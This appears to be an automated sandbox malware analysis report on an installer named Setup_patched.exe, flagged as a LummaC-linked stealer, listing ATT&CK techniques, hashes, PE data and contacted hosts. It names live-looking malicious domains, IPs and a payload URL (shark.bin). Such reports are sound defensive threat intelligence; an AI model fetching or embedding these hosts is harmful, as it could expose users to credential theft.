            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1586693990.0000000003656000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Setup_patched.exe PID: 7836, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            221
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Deobfuscate/Decode Files or Information
            LSASS Memory21
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol31
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
            Obfuscated Files or Information
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin Shares2
            Clipboard Data
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Setup_patched.exe7%VirustotalBrowse
            Setup_patched.exe6%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://jesxterplay.run/xB0%Avira URL Cloudsafe
            https://h1.mockupeastcoast.shop/100%Avira URL Cloudmalware
            https://h1.mockupeastcoast.sh0%Avira URL Cloudsafe
            jesxterplay.run/tuyhd0%Avira URL Cloudsafe
            https://jesxterplay.run/58270%Avira URL Cloudsafe
            https://jesxterplay.run/0%Avira URL Cloudsafe
            https://jesxterplay.run/ad0%Avira URL Cloudsafe
            https://jesxterplay.run/tuyhd#0%Avira URL Cloudsafe
            https://h1.mockupeastcoast.shop/shark.binh100%Avira URL Cloudmalware
            https://jesxterplay.run/ad0B0%Avira URL Cloudsafe
            https://jesxterplay.run/dateclpBS0%Avira URL Cloudsafe
            https://jesxterplay.run/os0%Avira URL Cloudsafe
            https://jesxterplay.run/tuyhdB0%Avira URL Cloudsafe
            https://jesxterplay.run/tuyhdM0%Avira URL Cloudsafe
            https://jesxterplay.run/22vGxB0%Avira URL Cloudsafe
            https://jesxterplay.run/tuyhd=0%Avira URL Cloudsafe
            https://jesxterplay.run/tuyhds0%Avira URL Cloudsafe
            https://jesxterplay.run:443/tuyhd0%Avira URL Cloudsafe
            https://jesxterplay.run/tuyhd0%Avira URL Cloudsafe
            https://jesxterplay.run/HB0%Avira URL Cloudsafe
            https://h1.mockupeastcoast.shop/n(100%Avira URL Cloudmalware
            https://h1.mockupeastcoast.shop/01100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            jesxterplay.run
            104.21.80.1
            truetrue
              unknown
              h1.mockupeastcoast.shop
              89.169.54.153
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                jawdedmirror.run/ewqdfalse
                  high
                  nighetwhisper.top/lekdfalse
                    high
                    jesxterplay.run/tuyhdtrue
                    • Avira URL Cloud: safe
                    unknown
                    changeaie.top/gepsfalse
                      high
                      owlflright.digital/qopyfalse
                        high
                        zestmodp.top/zedafalse
                          high
                          liftally.top/xasjfalse
                            high
                            salaccgfa.top/gsoozfalse
                              high
                              https://jesxterplay.run/tuyhdfalse
                              • Avira URL Cloud: safe
                              unknown
                              lonfgshadow.live/xawifalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/ac/?q=Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://jesxterplay.run/tuyhd#Setup_patched.exe, 00000003.00000003.1593315122.0000000000722000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://h1.mockupeastcoast.shSetup_patched.exe, 00000003.00000003.1624426120.000000000075D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://h1.mockupeastcoast.shop/Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://jesxterplay.run/Setup_patched.exe, 00000003.00000003.1452353554.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586096452.0000000000749000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://jesxterplay.run/adSetup_patched.exe, 00000003.00000003.1571702027.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586096452.0000000000749000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1569856850.0000000000748000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoSetup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://jesxterplay.run/xBSetup_patched.exe, 00000003.00000003.1625123685.0000000000749000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://jesxterplay.run/5827Setup_patched.exe, 00000003.00000003.1522009372.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://h1.mockupeastcoast.shop/shark.binhSetup_patched.exe, 00000003.00000003.1624449226.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://x1.c.lencr.org/0Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://x1.i.lencr.org/0Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://h1.mockupeastcoast.shop/shark.binSetup_patched.exe, 00000003.00000003.1624449226.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1624449226.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://jesxterplay.run/ad0BSetup_patched.exe, 00000003.00000003.1571702027.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1569856850.0000000000748000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/chrome_newtabv209hSetup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://jesxterplay.run/tuyhdsSetup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://jesxterplay.run/dateclpBSSetup_patched.exe, 00000003.00000003.1499316818.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://support.mozilla.org/products/firefoxgro.allSetup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.innosetup.com/Setup_patched.exefalse
                                                    high
                                                    https://jesxterplay.run/osSetup_patched.exe, 00000003.00000003.1586096452.0000000000749000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ac.ecosia.org?q=Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.rootca1.amazontrust.com0:Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://jesxterplay.run/tuyhdMSetup_patched.exe, 00000003.00000003.1499890116.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1522009372.000000000073A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://jesxterplay.run:443/tuyhdSetup_patched.exe, 00000003.00000003.1593315122.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.ecosia.org/newtab/v20Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://jesxterplay.run/tuyhdBSetup_patched.exe, 00000003.00000003.1484493432.000000000358F000.00000004.00000800.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1484810405.000000000358F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://jesxterplay.run/tuyhd=Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://jesxterplay.run/22vGxBSetup_patched.exe, 00000003.00000003.1522009372.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://jesxterplay.run/HBSetup_patched.exe, 00000003.00000003.1499316818.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://h1.mockupeastcoast.shop/n(Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://www.remobjects.com/psSetup_patched.exefalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://h1.mockupeastcoast.shop/01Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://gemini.google.com/app?q=Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        89.169.54.153
                                                                        h1.mockupeastcoast.shopRussian Federation
                                                                        31514INF-NET-ASRUfalse
                                                                        104.21.80.1
                                                                        jesxterplay.runUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1664107
                                                                        Start date and time:2025-04-13 17:04:09 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 4m 40s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Setup_patched.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 82%
                                                                        • Number of executed functions: 38
                                                                        • Number of non-executed functions: 83
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.76.34.6, 52.149.20.212, 150.171.28.254
                                                                        • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        TimeTypeDescription
                                                                        11:05:16API Interceptor8x Sleep call for process: Setup_patched.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        89.169.54.153#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                104.21.80.1WYCIAG_BANKOWY_5801_3RN10C_000_M_0063-2025_WZE_2025-04-09.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • www.uqcdnvgr.biz/hffh/
                                                                                PO#3011994797.exeGet hashmaliciousFormBookBrowse
                                                                                • www.6644win.mom/hs6j/
                                                                                m21qFR5hD4.ps1Get hashmaliciousUnknownBrowse
                                                                                • sonorous-horizon-cfd.cfd/c
                                                                                Doc5066755507-PO Copy.exeGet hashmaliciousFormBookBrowse
                                                                                • www.meshki-co-uk.shop/b8n0/
                                                                                mgqDKtYt6z.exeGet hashmaliciousFormBookBrowse
                                                                                • www.ppostealeone.shop/z4q1/
                                                                                zVLAGICBDE.exeGet hashmaliciousFormBookBrowse
                                                                                • www.ppostealeone.shop/zx3l/
                                                                                BZszWNbAJ8.exeGet hashmaliciousFormBookBrowse
                                                                                • www.meshki-co-uk.shop/b8n0/
                                                                                Microsoft-Order.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                • cdn-upload-files.buzz/c
                                                                                http://dd4.cewal.fun/906dbd852e21bfdd5b13cfa79aa1ff65be9543092b3ddd2d.potGet hashmaliciousUnknownBrowse
                                                                                • dd4.cewal.fun/906dbd852e21bfdd5b13cfa79aa1ff65be9543092b3ddd2d.pot
                                                                                Case#15745AB.lnkGet hashmaliciousUnknownBrowse
                                                                                • awcollectors.com/77.mp4
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                h1.mockupeastcoast.shop#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.62.250
                                                                                setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.62.250
                                                                                Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.62.250
                                                                                Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.141.59
                                                                                setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.141.59
                                                                                Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.62.250
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                INF-NET-ASRU#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 83.217.197.148
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 89.169.54.153
                                                                                utorrent_installer.exeGet hashmaliciousUnknownBrowse
                                                                                • 83.217.202.106
                                                                                resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 83.217.222.149
                                                                                MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zipGet hashmaliciousUnknownBrowse
                                                                                • 83.217.208.151
                                                                                jPKFh06jHI.exeGet hashmaliciousVidarBrowse
                                                                                • 83.217.208.144
                                                                                http://www.delawarejellystone.comGet hashmaliciousUnknownBrowse
                                                                                • 89.169.52.197
                                                                                CLOUDFLARENETUS#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.157.7
                                                                                https://onlyfans.com/bigmouthxfreeGet hashmaliciousUnknownBrowse
                                                                                • 172.66.0.44
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.5.162
                                                                                Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.131.70
                                                                                shegivenmekissinglips.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                • 104.21.32.1
                                                                                smss (2).exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                • 104.21.96.1
                                                                                KUzGUp4xs6.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                • 104.21.32.1
                                                                                Mi5cEY8M3R.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                • 104.21.48.1
                                                                                6pCmlKafCF.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                • 104.21.48.1
                                                                                1b3pICGT3V.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 104.21.64.1
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                a0e9f5d64349fb13191bc781f81f42e1#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                activate.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                activate.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                OGF4TzdXZ9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                SecuriteInfo.com.FileRepMalware.5979.10698.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                Nepomuk.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                RE_0078234567965441.pdf.wsfGet hashmaliciousKoadicBrowse
                                                                                • 104.21.80.1
                                                                                Rd_client_w_a_s_d.exeGet hashmaliciousHTMLPhisher, LummaC StealerBrowse
                                                                                • 104.21.80.1
                                                                                No context
                                                                                No created / dropped files found
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.892983600650409
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 97.32%
                                                                                • Windows ActiveX control (116523/4) 1.13%
                                                                                • Inno Setup installer (109748/4) 1.07%
                                                                                • InstallShield setup (43055/19) 0.42%
                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                File name:Setup_patched.exe
                                                                                File size:1'475'072 bytes
                                                                                MD5:b4e8bdda146b28cb226f3b1a77dbc7ec
                                                                                SHA1:52e88530567fc1154be2c11fea15018bb24e6824
                                                                                SHA256:0291228d9e8db56848514b2029803999ed513d8b549c2cc60a748d03ca39df55
                                                                                SHA512:1309e8be4f6dbafdfcf12e1f9766bdbaf110904e0ef9079409f77fc9185fcf78e17bd52c3598891be15140c6b762ccae0e42985437876a307ccdddd74e78c7f7
                                                                                SSDEEP:24576:EEZXjiinrzY5tO+uKE3eMT0jECZQEbLBDBEnFWsyg7x93THJ92/aolu96:pdmb4TKlD00C1O/u
                                                                                TLSH:E5656C22A3A64433D4732E75CD6BC2946C36BD202FA5944A7EF89F0C1E79B41BD35392
                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                Icon Hash:16312912b129310e
                                                                                Entrypoint:0x500004
                                                                                Entrypoint Section:.itext
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x55A7B085 [Thu Jul 16 13:24:21 2015 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:1f528eee57f931071fbd7756a8236e9f
                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                add esp, FFFFFFF0h
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                mov eax, 004FDD94h
                                                                                call 00007FCADCD1DB1Ah
                                                                                push FFFFFFECh
                                                                                mov eax, dword ptr [00503E14h]
                                                                                mov eax, dword ptr [eax]
                                                                                mov ebx, dword ptr [eax+00000170h]
                                                                                push ebx
                                                                                call 00007FCADCD1E9BDh
                                                                                and eax, FFFFFF7Fh
                                                                                push eax
                                                                                push FFFFFFECh
                                                                                mov eax, dword ptr [00503E14h]
                                                                                push ebx
                                                                                call 00007FCADCD1EC12h
                                                                                xor eax, eax
                                                                                push ebp
                                                                                push 0050007Fh
                                                                                push dword ptr fs:[eax]
                                                                                mov dword ptr fs:[eax], esp
                                                                                push 00000001h
                                                                                call 00007FCADCD1E365h
                                                                                call 00007FCADCE12664h
                                                                                mov eax, dword ptr [004FD9CCh]
                                                                                push eax
                                                                                push 004FDA30h
                                                                                mov eax, dword ptr [00503E14h]
                                                                                mov eax, dword ptr [eax]
                                                                                call 00007FCADCD90E0Dh
                                                                                call 00007FCADCE126B8h
                                                                                xor eax, eax
                                                                                pop edx
                                                                                pop ecx
                                                                                pop ecx
                                                                                mov dword ptr fs:[eax], edx
                                                                                jmp 00007FCADCE14BFBh
                                                                                jmp 00007FCADCD19241h
                                                                                call 00007FCADCE12434h
                                                                                mov eax, 00000001h
                                                                                call 00007FCADCD19D02h
                                                                                call 00007FCADCD19685h
                                                                                mov eax, dword ptr [00503E14h]
                                                                                mov eax, dword ptr [eax]
                                                                                mov edx, 00500214h
                                                                                call 00007FCADCD90918h
                                                                                push 00000005h
                                                                                mov eax, dword ptr [00503E14h]
                                                                                mov eax, dword ptr [eax]
                                                                                mov eax, dword ptr [eax+00000170h]
                                                                                push eax
                                                                                call 00007FCADCD1EBD3h
                                                                                mov eax, dword ptr [00503E14h]
                                                                                mov eax, dword ptr [eax]
                                                                                mov edx, dword ptr [004D8D14h]
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x10c0000x382c.idata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1120000x62800.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x1110000x18.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10ca7c0x888.idata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000xfd2240xfd4005606816c0e3ddb1f4eb74b4fc974cc99False0.48292124259624875data6.48940093273947IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .itext0xff0000x12200x14006af5b74ebcd128d62db3adf99a2fdadeFalse0.50546875data5.686380733031578IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .data0x1010000x303c0x3200e451917917f4a9d9e9f972f25b034fdfFalse0.4203125data4.301472640349721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .bss0x1050000x61900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
